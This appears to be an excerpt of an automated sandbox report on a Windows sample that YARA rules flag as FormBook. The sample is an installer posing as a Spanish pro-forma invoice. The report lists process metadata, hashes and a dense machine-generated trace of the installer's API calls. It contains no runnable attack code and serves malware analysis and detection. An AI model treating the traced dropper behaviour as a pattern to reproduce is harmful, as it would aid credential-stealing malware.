                                                Imagebase:0x160000
                                                File size:31'744 bytes
                                                MD5 hash:B5D49238841360E079DA1EC4627684EA
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:6
                                                Start time:12:21:03
                                                Start date:15/01/2025
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:
                                                File size:597'432 bytes
                                                MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                  Execution Graph

                                                  Execution Coverage:20.6%
                                                  Dynamic/Decrypted Code Coverage:13.5%
                                                  Signature Coverage:16.7%
                                                  Total number of Nodes:1603
                                                  Total number of Limit Nodes:43
5726 402968 5725->5726 5725->5727 5729 406541 lstrcpynW 5726->5729 5729->5727 4438 405705 4439 405726 GetDlgItem GetDlgItem GetDlgItem 4438->4439 4440 4058af 4438->4440 4484 4044f5 SendMessageW 4439->4484 4442 4058e0 4440->4442 4443 4058b8 GetDlgItem CreateThread CloseHandle 4440->4443 4444 40590b 4442->4444 4446 405930 4442->4446 4447 4058f7 ShowWindow ShowWindow 4442->4447 4443->4442 4498 405699 OleInitialize 4443->4498 4448 405917 4444->4448 4449 40596b 4444->4449 4445 405796 4454 40579d GetClientRect GetSystemMetrics SendMessageW SendMessageW 4445->4454 4453 404527 8 API calls 4446->4453 4486 4044f5 SendMessageW 4447->4486 4451 405945 ShowWindow 4448->4451 4452 40591f 4448->4452 4449->4446 4457 405979 SendMessageW 4449->4457 4460 405965 4451->4460 4461 405957 4451->4461 4458 404499 SendMessageW 4452->4458 4459 40593e 4453->4459 4455 40580b 4454->4455 4456 4057ef SendMessageW SendMessageW 4454->4456 4462 405810 SendMessageW 4455->4462 4463 40581e 4455->4463 4456->4455 4457->4459 4464 405992 CreatePopupMenu 4457->4464 4458->4446 4466 404499 SendMessageW 4460->4466 4487 4055c6 4461->4487 4462->4463 4468 4044c0 22 API calls 4463->4468 4467 40657e 21 API calls 4464->4467 4466->4449 4469 4059a2 AppendMenuW 4467->4469 4470 40582e 4468->4470 4471 4059d2 TrackPopupMenu 4469->4471 4472 4059bf GetWindowRect 4469->4472 4473 405837 ShowWindow 4470->4473 4474 40586b GetDlgItem SendMessageW 4470->4474 4471->4459 4475 4059ed 4471->4475 4472->4471 4476 40585a 4473->4476 4477 40584d ShowWindow 4473->4477 4474->4459 4478 405892 SendMessageW SendMessageW 4474->4478 4479 405a09 SendMessageW 4475->4479 4485 4044f5 SendMessageW 4476->4485 4477->4476 4478->4459 4479->4479 4480 405a26 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4479->4480 4482 405a4b SendMessageW 4480->4482 4482->4482 4483 405a74 GlobalUnlock SetClipboardData CloseClipboard 4482->4483 4483->4459 4484->4445 4485->4474 4486->4444 4488 4055e1 4487->4488 4496 405683 4487->4496 4489 4055fd lstrlenW 4488->4489 4490 
40657e 21 API calls 4488->4490 4491 405626 4489->4491 4492 40560b lstrlenW 4489->4492 4490->4489 4494 405639 4491->4494 4495 40562c SetWindowTextW 4491->4495 4493 40561d lstrcatW 4492->4493 4492->4496 4493->4491 4494->4496 4497 40563f SendMessageW SendMessageW SendMessageW 4494->4497 4495->4494 4496->4460 4497->4496 4499 40450c SendMessageW 4498->4499 4502 4056bc 4499->4502 4500 4056e3 4501 40450c SendMessageW 4500->4501 4503 4056f5 OleUninitialize 4501->4503 4502->4500 4504 401389 2 API calls 4502->4504 4504->4502 5730 404d07 5731 404d33 5730->5731 5732 404d17 5730->5732 5733 404d66 5731->5733 5734 404d39 SHGetPathFromIDListW 5731->5734 5741 405b85 GetDlgItemTextW 5732->5741 5737 404d50 SendMessageW 5734->5737 5738 404d49 5734->5738 5736 404d24 SendMessageW 5736->5731 5737->5733 5739 40140b 2 API calls 5738->5739 5739->5737 5741->5736 5742 401588 5743 402bc9 5742->5743 5746 406488 wsprintfW 5743->5746 5745 402bce 5746->5745 5747 40198d 5748 402da9 21 API calls 5747->5748 5749 401994 5748->5749 5750 402da9 21 API calls 5749->5750 5751 4019a1 5750->5751 5752 402dcb 21 API calls 5751->5752 5753 4019b8 lstrlenW 5752->5753 5755 4019c9 5753->5755 5754 401a0a 5755->5754 5759 406541 lstrcpynW 5755->5759 5757 4019fa 5757->5754 5758 4019ff lstrlenW 5757->5758 5758->5754 5759->5757 5760 40168f 5761 402dcb 21 API calls 5760->5761 5762 401695 5761->5762 5763 40689e 2 API calls 5762->5763 5764 40169b 5763->5764 5765 402b10 5766 402da9 21 API calls 5765->5766 5767 402b16 5766->5767 5768 40657e 21 API calls 5767->5768 5769 402953 5767->5769 5768->5769 4796 402711 4797 402da9 21 API calls 4796->4797 4805 402720 4797->4805 4798 40285d 4799 40276a ReadFile 4799->4798 4799->4805 4800 402803 4800->4798 4800->4805 4810 406112 SetFilePointer 4800->4810 4801 4060b4 ReadFile 4801->4805 4803 4027aa MultiByteToWideChar 4803->4805 4804 40285f 4819 406488 wsprintfW 4804->4819 4805->4798 4805->4799 4805->4800 4805->4801 4805->4803 4805->4804 4807 4027d0 SetFilePointer MultiByteToWideChar 
4805->4807 4808 402870 4805->4808 4807->4805 4808->4798 4809 402891 SetFilePointer 4808->4809 4809->4798 4811 40612e 4810->4811 4814 406146 4810->4814 4812 4060b4 ReadFile 4811->4812 4813 40613a 4812->4813 4813->4814 4815 406177 SetFilePointer 4813->4815 4816 40614f SetFilePointer 4813->4816 4814->4800 4815->4814 4816->4815 4817 40615a 4816->4817 4818 4060e3 WriteFile 4817->4818 4818->4814 4819->4798 5770 401491 5771 4055c6 28 API calls 5770->5771 5772 401498 5771->5772 4820 401794 4821 402dcb 21 API calls 4820->4821 4822 40179b 4821->4822 4823 4017c3 4822->4823 4824 4017bb 4822->4824 4861 406541 lstrcpynW 4823->4861 4860 406541 lstrcpynW 4824->4860 4827 4017c1 4831 4067ef 5 API calls 4827->4831 4828 4017ce 4829 405e10 3 API calls 4828->4829 4830 4017d4 lstrcatW 4829->4830 4830->4827 4834 4017e0 4831->4834 4832 40689e 2 API calls 4832->4834 4833 40181c 4835 40600c 2 API calls 4833->4835 4834->4832 4834->4833 4837 4017f2 CompareFileTime 4834->4837 4838 4018b2 4834->4838 4845 40657e 21 API calls 4834->4845 4849 406541 lstrcpynW 4834->4849 4855 405ba1 MessageBoxIndirectW 4834->4855 4857 401889 4834->4857 4859 406031 GetFileAttributesW CreateFileW 4834->4859 4835->4834 4837->4834 4839 4055c6 28 API calls 4838->4839 4840 4018bc 4839->4840 4842 4032d9 39 API calls 4840->4842 4841 4055c6 28 API calls 4847 40189e 4841->4847 4843 4018cf 4842->4843 4844 4018e3 SetFileTime 4843->4844 4846 4018f5 CloseHandle 4843->4846 4844->4846 4845->4834 4846->4847 4848 401906 4846->4848 4850 40190b 4848->4850 4851 40191e 4848->4851 4849->4834 4853 40657e 21 API calls 4850->4853 4852 40657e 21 API calls 4851->4852 4854 401926 4852->4854 4856 401913 lstrcatW 4853->4856 4854->4847 4858 405ba1 MessageBoxIndirectW 4854->4858 4855->4834 4856->4854 4857->4841 4857->4847 4858->4847 4859->4834 4860->4827 4861->4828 5787 401a97 5788 402da9 21 API calls 5787->5788 5789 401aa0 5788->5789 5790 402da9 21 API calls 5789->5790 5791 401a45 5790->5791 5792 401598 5793 4015b1 5792->5793 5794 4015a8 
ShowWindow 5792->5794 5795 402c4f 5793->5795 5796 4015bf ShowWindow 5793->5796 5794->5793 5796->5795 4902 402419 4903 402dcb 21 API calls 4902->4903 4904 402428 4903->4904 4905 402dcb 21 API calls 4904->4905 4906 402431 4905->4906 4907 402dcb 21 API calls 4906->4907 4908 40243b GetPrivateProfileStringW 4907->4908 5797 40201b 5798 402dcb 21 API calls 5797->5798 5799 402022 5798->5799 5800 40689e 2 API calls 5799->5800 5801 402028 5800->5801 5803 402039 5801->5803 5804 406488 wsprintfW 5801->5804 5804->5803 4909 40351c SetErrorMode GetVersionExW 4910 403570 GetVersionExW 4909->4910 4911 4035a8 4909->4911 4910->4911 4912 4035ff 4911->4912 4913 406935 5 API calls 4911->4913 4914 4068c5 3 API calls 4912->4914 4913->4912 4915 403615 lstrlenA 4914->4915 4915->4912 4916 403625 4915->4916 4917 406935 5 API calls 4916->4917 4918 40362c 4917->4918 4919 406935 5 API calls 4918->4919 4920 403633 4919->4920 4921 406935 5 API calls 4920->4921 4922 40363f #17 OleInitialize SHGetFileInfoW 4921->4922 4997 406541 lstrcpynW 4922->4997 4925 40368e GetCommandLineW 4998 406541 lstrcpynW 4925->4998 4927 4036a0 4928 405e3d CharNextW 4927->4928 4929 4036c6 CharNextW 4928->4929 4935 4036d8 4929->4935 4930 4037da 4931 4037ee GetTempPathW 4930->4931 4999 4034eb 4931->4999 4933 403806 4936 403860 DeleteFileW 4933->4936 4937 40380a GetWindowsDirectoryW lstrcatW 4933->4937 4934 405e3d CharNextW 4934->4935 4935->4930 4935->4934 4943 4037dc 4935->4943 5009 4030a2 GetTickCount GetModuleFileNameW 4936->5009 4939 4034eb 12 API calls 4937->4939 4941 403826 4939->4941 4940 403874 4949 405e3d CharNextW 4940->4949 4980 40391b 4940->4980 4988 40392b 4940->4988 4941->4936 4942 40382a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4941->4942 4944 4034eb 12 API calls 4942->4944 5093 406541 lstrcpynW 4943->5093 4947 403858 4944->4947 4947->4936 4947->4988 4953 403893 4949->4953 4951 403a79 4954 405ba1 MessageBoxIndirectW 4951->4954 4952 403a9d 4955 403b21 ExitProcess 4952->4955 4956 
403aa5 GetCurrentProcess OpenProcessToken 4952->4956 4957 4038f1 4953->4957 4958 403934 4953->4958 4960 403a87 ExitProcess 4954->4960 4961 403af1 4956->4961 4962 403abd LookupPrivilegeValueW AdjustTokenPrivileges 4956->4962 4963 405f18 18 API calls 4957->4963 4964 405b0c 5 API calls 4958->4964 4965 406935 5 API calls 4961->4965 4962->4961 4966 4038fd 4963->4966 4967 403939 lstrlenW 4964->4967 4968 403af8 4965->4968 4966->4988 5094 406541 lstrcpynW 4966->5094 5096 406541 lstrcpynW 4967->5096 4969 403b0d ExitWindowsEx 4968->4969 4971 403b1a 4968->4971 4969->4955 4969->4971 4975 40140b 2 API calls 4971->4975 4973 403953 4974 40396b 4973->4974 5097 406541 lstrcpynW 4973->5097 4979 403991 wsprintfW 4974->4979 4994 4039bd 4974->4994 4975->4955 4976 403910 5095 406541 lstrcpynW 4976->5095 4981 40657e 21 API calls 4979->4981 5037 403c13 4980->5037 4981->4974 4982 405a95 2 API calls 4982->4994 4983 405aef 2 API calls 4983->4994 4984 403a07 SetCurrentDirectoryW 4986 406301 40 API calls 4984->4986 4985 4039cd GetFileAttributesW 4987 4039d9 DeleteFileW 4985->4987 4985->4994 4989 403a16 CopyFileW 4986->4989 4987->4994 5098 403b39 4988->5098 4989->4988 4989->4994 4990 405c4d 71 API calls 4990->4994 4991 406301 40 API calls 4991->4994 4992 40657e 21 API calls 4992->4994 4993 405b24 2 API calls 4993->4994 4994->4974 4994->4979 4994->4982 4994->4983 4994->4984 4994->4985 4994->4988 4994->4990 4994->4991 4994->4992 4994->4993 4995 403a8f CloseHandle 4994->4995 4996 40689e 2 API calls 4994->4996 4995->4988 4996->4994 4997->4925 4998->4927 5000 4067ef 5 API calls 4999->5000 5002 4034f7 5000->5002 5001 403501 5001->4933 5002->5001 5003 405e10 3 API calls 5002->5003 5004 403509 5003->5004 5005 405aef 2 API calls 5004->5005 5006 40350f 5005->5006 5007 406060 2 API calls 5006->5007 5008 40351a 5007->5008 5008->4933 5105 406031 GetFileAttributesW CreateFileW 5009->5105 5011 4030e2 5036 4030f2 5011->5036 5106 406541 lstrcpynW 5011->5106 5013 403108 5014 405e5c 2 API calls 5013->5014 5015 
40310e 5014->5015 5107 406541 lstrcpynW 5015->5107 5017 403119 GetFileSize 5032 403213 5017->5032 5035 403130 5017->5035 5019 40321c 5021 40324c GlobalAlloc 5019->5021 5019->5036 5120 4034d4 SetFilePointer 5019->5120 5020 4034be ReadFile 5020->5035 5119 4034d4 SetFilePointer 5021->5119 5024 40327f 5026 40303e 6 API calls 5024->5026 5025 403267 5028 4032d9 39 API calls 5025->5028 5026->5036 5027 403235 5029 4034be ReadFile 5027->5029 5033 403273 5028->5033 5030 403240 5029->5030 5030->5021 5030->5036 5031 40303e 6 API calls 5031->5035 5108 40303e 5032->5108 5033->5033 5034 4032b0 SetFilePointer 5033->5034 5033->5036 5034->5036 5035->5020 5035->5024 5035->5031 5035->5032 5035->5036 5036->4940 5038 406935 5 API calls 5037->5038 5039 403c27 5038->5039 5040 403c2d 5039->5040 5041 403c3f 5039->5041 5129 406488 wsprintfW 5040->5129 5042 40640f 3 API calls 5041->5042 5043 403c6f 5042->5043 5045 403c8e lstrcatW 5043->5045 5047 40640f 3 API calls 5043->5047 5046 403c3d 5045->5046 5121 403ee9 5046->5121 5047->5045 5050 405f18 18 API calls 5051 403cc0 5050->5051 5052 403d54 5051->5052 5054 40640f 3 API calls 5051->5054 5053 405f18 18 API calls 5052->5053 5055 403d5a 5053->5055 5056 403cf2 5054->5056 5057 403d6a LoadImageW 5055->5057 5058 40657e 21 API calls 5055->5058 5056->5052 5061 403d13 lstrlenW 5056->5061 5065 405e3d CharNextW 5056->5065 5059 403e10 5057->5059 5060 403d91 RegisterClassW 5057->5060 5058->5057 5063 40140b 2 API calls 5059->5063 5062 403dc7 SystemParametersInfoW CreateWindowExW 5060->5062 5092 403e1a 5060->5092 5066 403d21 lstrcmpiW 5061->5066 5067 403d47 5061->5067 5062->5059 5064 403e16 5063->5064 5071 403ee9 22 API calls 5064->5071 5064->5092 5069 403d10 5065->5069 5066->5067 5070 403d31 GetFileAttributesW 5066->5070 5068 405e10 3 API calls 5067->5068 5072 403d4d 5068->5072 5069->5061 5073 403d3d 5070->5073 5075 403e27 5071->5075 5130 406541 lstrcpynW 5072->5130 5073->5067 5074 405e5c 2 API calls 5073->5074 5074->5067 5077 403e33 ShowWindow 5075->5077 
5078 403eb6 5075->5078 5080 4068c5 3 API calls 5077->5080 5079 405699 5 API calls 5078->5079 5081 403ebc 5079->5081 5082 403e4b 5080->5082 5083 403ec0 5081->5083 5084 403ed8 5081->5084 5085 403e59 GetClassInfoW 5082->5085 5087 4068c5 3 API calls 5082->5087 5090 40140b 2 API calls 5083->5090 5083->5092 5086 40140b 2 API calls 5084->5086 5088 403e83 DialogBoxParamW 5085->5088 5089 403e6d GetClassInfoW RegisterClassW 5085->5089 5086->5092 5087->5085 5091 40140b 2 API calls 5088->5091 5089->5088 5090->5092 5091->5092 5092->4988 5093->4931 5094->4976 5095->4980 5096->4973 5097->4974 5099 403b51 5098->5099 5100 403b43 CloseHandle 5098->5100 5132 403b7e 5099->5132 5100->5099 5103 405c4d 71 API calls 5104 403a6c OleUninitialize 5103->5104 5104->4951 5104->4952 5105->5011 5106->5013 5107->5017 5109 403047 5108->5109 5110 40305f 5108->5110 5111 403050 DestroyWindow 5109->5111 5112 403057 5109->5112 5113 403067 5110->5113 5114 40306f GetTickCount 5110->5114 5111->5112 5112->5019 5115 406971 2 API calls 5113->5115 5116 4030a0 5114->5116 5117 40307d CreateDialogParamW ShowWindow 5114->5117 5118 40306d 5115->5118 5116->5019 5117->5116 5118->5019 5119->5025 5120->5027 5122 403efd 5121->5122 5131 406488 wsprintfW 5122->5131 5124 403f6e 5125 403fa2 22 API calls 5124->5125 5127 403f73 5125->5127 5126 403c9e 5126->5050 5127->5126 5128 40657e 21 API calls 5127->5128 5128->5127 5129->5046 5130->5052 5131->5124 5133 403b8c 5132->5133 5134 403b56 5133->5134 5135 403b91 FreeLibrary GlobalFree 5133->5135 5134->5103 5135->5134 5135->5135 5812 401b9c 5813 402dcb 21 API calls 5812->5813 5814 401ba3 5813->5814 5815 402da9 21 API calls 5814->5815 5816 401bac wsprintfW 5815->5816 5817 402c4f 5816->5817 5818 40149e 5819 4023c2 5818->5819 5820 4014ac PostQuitMessage 5818->5820 5820->5819 5821 4016a0 5822 402dcb 21 API calls 5821->5822 5823 4016a7 5822->5823 5824 402dcb 21 API calls 5823->5824 5825 4016b0 5824->5825 5826 402dcb 21 API calls 5825->5826 5827 4016b9 MoveFileW 5826->5827 5828 4016cc 
5827->5828 5834 4016c5 5827->5834 5830 40689e 2 API calls 5828->5830 5832 40231b 5828->5832 5829 401423 28 API calls 5829->5832 5831 4016db 5830->5831 5831->5832 5833 406301 40 API calls 5831->5833 5833->5834 5834->5829 5835 401a24 5836 402dcb 21 API calls 5835->5836 5837 401a2b 5836->5837 5838 402dcb 21 API calls 5837->5838 5839 401a34 5838->5839 5840 401a3b lstrcmpiW 5839->5840 5841 401a4d lstrcmpW 5839->5841 5842 401a41 5840->5842 5841->5842 5843 402324 5844 402dcb 21 API calls 5843->5844 5845 40232a 5844->5845 5846 402dcb 21 API calls 5845->5846 5847 402333 5846->5847 5848 402dcb 21 API calls 5847->5848 5849 40233c 5848->5849 5850 40689e 2 API calls 5849->5850 5851 402345 5850->5851 5852 402356 lstrlenW lstrlenW 5851->5852 5853 402349 5851->5853 5855 4055c6 28 API calls 5852->5855 5854 4055c6 28 API calls 5853->5854 5856 402351 5853->5856 5854->5856 5857 402394 SHFileOperationW 5855->5857 5857->5853 5857->5856 5858 401da6 5859 401db9 GetDlgItem 5858->5859 5860 401dac 5858->5860 5862 401db3 5859->5862 5861 402da9 21 API calls 5860->5861 5861->5862 5863 401dfa GetClientRect LoadImageW SendMessageW 5862->5863 5864 402dcb 21 API calls 5862->5864 5866 401e58 5863->5866 5868 401e64 5863->5868 5864->5863 5867 401e5d DeleteObject 5866->5867 5866->5868 5867->5868 5869 4023a8 5870 4023af 5869->5870 5872 4023c2 5869->5872 5871 40657e 21 API calls 5870->5871 5873 4023bc 5871->5873 5873->5872 5874 405ba1 MessageBoxIndirectW 5873->5874 5874->5872 5875 402c2a SendMessageW 5876 402c44 InvalidateRect 5875->5876 5877 402c4f 5875->5877 5876->5877 5885 404f2d GetDlgItem GetDlgItem 5886 4051a4 5885->5886 5887 404f7f 7 API calls 5885->5887 5906 405286 5886->5906 5920 405213 5886->5920 5939 404e7b SendMessageW 5886->5939 5888 405026 DeleteObject 5887->5888 5889 405019 SendMessageW 5887->5889 5890 40502f 5888->5890 5889->5888 5891 405066 5890->5891 5892 40657e 21 API calls 5890->5892 5893 4044c0 22 API calls 5891->5893 5897 405048 SendMessageW SendMessageW 5892->5897 5898 40507a 
5893->5898 5894 405332 5895 405344 5894->5895 5896 40533c SendMessageW 5894->5896 5908 405356 ImageList_Destroy 5895->5908 5909 40535d 5895->5909 5914 40536d 5895->5914 5896->5895 5897->5890 5903 4044c0 22 API calls 5898->5903 5899 405197 5901 404527 8 API calls 5899->5901 5900 405278 SendMessageW 5900->5906 5907 405533 5901->5907 5917 40508b 5903->5917 5904 4052df SendMessageW 5904->5899 5905 4052f4 SendMessageW 5904->5905 5911 405307 5905->5911 5906->5894 5906->5899 5906->5904 5908->5909 5912 405366 GlobalFree 5909->5912 5909->5914 5910 4054e7 5910->5899 5915 4054f9 ShowWindow GetDlgItem ShowWindow 5910->5915 5922 405318 SendMessageW 5911->5922 5912->5914 5913 405166 GetWindowLongW SetWindowLongW 5916 40517f 5913->5916 5914->5910 5932 4053a8 5914->5932 5944 404efb 5914->5944 5915->5899 5918 405184 ShowWindow 5916->5918 5919 40519c 5916->5919 5917->5913 5921 4050de SendMessageW 5917->5921 5923 405161 5917->5923 5926 405130 SendMessageW 5917->5926 5927 40511c SendMessageW 5917->5927 5937 4044f5 SendMessageW 5918->5937 5938 4044f5 SendMessageW 5919->5938 5920->5900 5920->5906 5921->5917 5922->5894 5923->5913 5923->5916 5926->5917 5927->5917 5929 4054b2 5930 4054bd InvalidateRect 5929->5930 5933 4054c9 5929->5933 5930->5933 5931 4053d6 SendMessageW 5936 4053ec 5931->5936 5932->5931 5932->5936 5933->5910 5953 404e36 5933->5953 5935 405460 SendMessageW SendMessageW 5935->5936 5936->5929 5936->5935 5937->5899 5938->5886 5940 404eda SendMessageW 5939->5940 5941 404e9e GetMessagePos ScreenToClient SendMessageW 5939->5941 5942 404ed2 5940->5942 5941->5942 5943 404ed7 5941->5943 5942->5920 5943->5940 5956 406541 lstrcpynW 5944->5956 5946 404f0e 5957 406488 wsprintfW 5946->5957 5948 404f18 5949 40140b 2 API calls 5948->5949 5950 404f21 5949->5950 5958 406541 lstrcpynW 5950->5958 5952 404f28 5952->5932 5959 404d6d 5953->5959 5955 404e4b 5955->5910 5956->5946 5957->5948 5958->5952 5960 404d86 5959->5960 5961 40657e 21 API calls 5960->5961 5962 404dea 5961->5962 5963 40657e 21 
API calls 5962->5963 5964 404df5 5963->5964 5965 40657e 21 API calls 5964->5965 5966 404e0b lstrlenW wsprintfW SetDlgItemTextW 5965->5966 5966->5955 4729 4024af 4730 402dcb 21 API calls 4729->4730 4731 4024c1 4730->4731 4732 402dcb 21 API calls 4731->4732 4733 4024cb 4732->4733 4746 402e5b 4733->4746 4736 402c4f 4737 402dcb 21 API calls 4741 4024f9 lstrlenW 4737->4741 4738 402503 4739 40250f 4738->4739 4742 402da9 21 API calls 4738->4742 4740 40252e RegSetValueExW 4739->4740 4750 4032d9 4739->4750 4744 402544 RegCloseKey 4740->4744 4741->4738 4742->4739 4744->4736 4747 402e76 4746->4747 4771 4063dc 4747->4771 4752 4032f2 4750->4752 4751 40331d 4775 4034be 4751->4775 4752->4751 4785 4034d4 SetFilePointer 4752->4785 4756 40333a GetTickCount 4767 40334d 4756->4767 4757 40345e 4758 403462 4757->4758 4762 40347a 4757->4762 4760 4034be ReadFile 4758->4760 4759 403448 4759->4740 4760->4759 4761 4034be ReadFile 4761->4762 4762->4759 4762->4761 4764 4060e3 WriteFile 4762->4764 4763 4034be ReadFile 4763->4767 4764->4762 4766 4033b3 GetTickCount 4766->4767 4767->4759 4767->4763 4767->4766 4768 4033dc MulDiv wsprintfW 4767->4768 4770 4060e3 WriteFile 4767->4770 4778 406ab0 4767->4778 4769 4055c6 28 API calls 4768->4769 4769->4767 4770->4767 4772 4063eb 4771->4772 4773 4024db 4772->4773 4774 4063f6 RegCreateKeyExW 4772->4774 4773->4736 4773->4737 4773->4738 4774->4773 4776 4060b4 ReadFile 4775->4776 4777 403328 4776->4777 4777->4756 4777->4757 4777->4759 4779 406ad5 4778->4779 4780 406add 4778->4780 4779->4767 4780->4779 4781 406b64 GlobalFree 4780->4781 4782 406b6d GlobalAlloc 4780->4782 4783 406be4 GlobalAlloc 4780->4783 4784 406bdb GlobalFree 4780->4784 4781->4782 4782->4779 4782->4780 4783->4779 4783->4780 4784->4783 4785->4751 4786 402930 4787 402dcb 21 API calls 4786->4787 4788 402937 FindFirstFileW 4787->4788 4789 40294a 4788->4789 4790 40295f 4788->4790 4791 402968 4790->4791 4794 406488 wsprintfW 4790->4794 4795 406541 lstrcpynW 4791->4795 4794->4791 4795->4789 5967 
404630 lstrlenW 5968 404651 WideCharToMultiByte 5967->5968 5969 40464f 5967->5969 5969->5968 5970 401931 5971 401968 5970->5971 5972 402dcb 21 API calls 5971->5972 5973 40196d 5972->5973 5974 405c4d 71 API calls 5973->5974 5975 401976 5974->5975 5976 4049b1 5977 4049dd 5976->5977 5978 4049ee 5976->5978 6037 405b85 GetDlgItemTextW 5977->6037 5980 4049fa GetDlgItem 5978->5980 5987 404a59 5978->5987 5985 404a0e 5980->5985 5981 4049e8 5982 4067ef 5 API calls 5981->5982 5982->5978 5983 404b3d 5986 404cec 5983->5986 6039 405b85 GetDlgItemTextW 5983->6039 5984 404a22 SetWindowTextW 5991 4044c0 22 API calls 5984->5991 5985->5984 5990 405ebb 4 API calls 5985->5990 5989 404527 8 API calls 5986->5989 5987->5983 5987->5986 5992 40657e 21 API calls 5987->5992 5994 404d00 5989->5994 5995 404a18 5990->5995 5996 404a3e 5991->5996 5997 404acd SHBrowseForFolderW 5992->5997 5993 404b6d 5998 405f18 18 API calls 5993->5998 5995->5984 6004 405e10 3 API calls 5995->6004 5999 4044c0 22 API calls 5996->5999 5997->5983 6000 404ae5 CoTaskMemFree 5997->6000 6001 404b73 5998->6001 6002 404a4c 5999->6002 6003 405e10 3 API calls 6000->6003 6040 406541 lstrcpynW 6001->6040 6038 4044f5 SendMessageW 6002->6038 6006 404af2 6003->6006 6004->5984 6009 404b29 SetDlgItemTextW 6006->6009 6013 40657e 21 API calls 6006->6013 6008 404a52 6011 406935 5 API calls 6008->6011 6009->5983 6010 404b8a 6012 406935 5 API calls 6010->6012 6011->5987 6020 404b91 6012->6020 6014 404b11 lstrcmpiW 6013->6014 6014->6009 6017 404b22 lstrcatW 6014->6017 6015 404bd2 6041 406541 lstrcpynW 6015->6041 6017->6009 6018 404bd9 6019 405ebb 4 API calls 6018->6019 6021 404bdf GetDiskFreeSpaceW 6019->6021 6020->6015 6024 405e5c 2 API calls 6020->6024 6026 404c2a 6020->6026 6023 404c03 MulDiv 6021->6023 6021->6026 6023->6026 6024->6020 6025 404c9b 6028 404cbe 6025->6028 6030 40140b 2 API calls 6025->6030 6026->6025 6027 404e36 24 API calls 6026->6027 6029 404c88 6027->6029 6042 4044e2 KiUserCallbackDispatcher 6028->6042 6032 404c9d 
SetDlgItemTextW 6029->6032 6033 404c8d 6029->6033 6030->6028 6032->6025 6035 404d6d 24 API calls 6033->6035 6034 404cda 6034->5986 6036 40490a SendMessageW 6034->6036 6035->6025 6036->5986 6037->5981 6038->6008 6039->5993 6040->6010 6041->6018 6042->6034 6043 707e170d 6044 707e15b6 GlobalFree 6043->6044 6047 707e1725 6044->6047 6045 707e176b GlobalFree 6046 707e1740 6046->6045 6047->6045 6047->6046 6048 707e1757 VirtualFree 6047->6048 6048->6045 6049 401934 6050 402dcb 21 API calls 6049->6050 6051 40193b 6050->6051 6052 405ba1 MessageBoxIndirectW 6051->6052 6053 401944 6052->6053 4862 4028b6 4863 4028bd 4862->4863 4865 402bce 4862->4865 4864 402da9 21 API calls 4863->4864 4866 4028c4 4864->4866 4867 4028d3 SetFilePointer 4866->4867 4867->4865 4868 4028e3 4867->4868 4870 406488 wsprintfW 4868->4870 4870->4865 6054 401f37 6055 402dcb 21 API calls 6054->6055 6056 401f3d 6055->6056 6057 402dcb 21 API calls 6056->6057 6058 401f46 6057->6058 6059 402dcb 21 API calls 6058->6059 6060 401f4f 6059->6060 6061 402dcb 21 API calls 6060->6061 6062 401f58 6061->6062 6063 401423 28 API calls 6062->6063 6064 401f5f 6063->6064 6071 405b67 ShellExecuteExW 6064->6071 6066 401fa7 6067 4069e0 5 API calls 6066->6067 6069 402953 6066->6069 6068 401fc4 CloseHandle 6067->6068 6068->6069 6071->6066 6072 4014b8 6073 4014be 6072->6073 6074 401389 2 API calls 6073->6074 6075 4014c6 6074->6075 6076 402fb8 6077 402fe3 6076->6077 6078 402fca SetTimer 6076->6078 6079 403038 6077->6079 6080 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 6077->6080 6078->6077 6080->6079 6081 40553a 6082 40554a 6081->6082 6083 40555e 6081->6083 6084 405550 6082->6084 6093 4055a7 6082->6093 6085 405566 IsWindowVisible 6083->6085 6089 40557d 6083->6089 6087 40450c SendMessageW 6084->6087 6088 405573 6085->6088 6085->6093 6086 4055ac CallWindowProcW 6090 40555a 6086->6090 6087->6090 6091 404e7b 5 API calls 6088->6091 6089->6086 6092 404efb 4 API calls 6089->6092 6091->6089 6092->6093 6093->6086 6094 401d3c 6095 
402da9 21 API calls 6094->6095 6096 401d42 IsWindow 6095->6096 6097 401a45 6096->6097 6098 707e1000 6099 707e101b 5 API calls 6098->6099 6100 707e1019 6099->6100

                                                  Control-flow Graph for the function at 0040351C
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 0040353F
                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
                                                  • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
                                                  • OleInitialize.OLE32(00000000), ref: 0040365A
                                                  • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
                                                  • GetCommandLineW.KERNEL32(Baboodom111 Setup,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe",00000020,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036C7
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
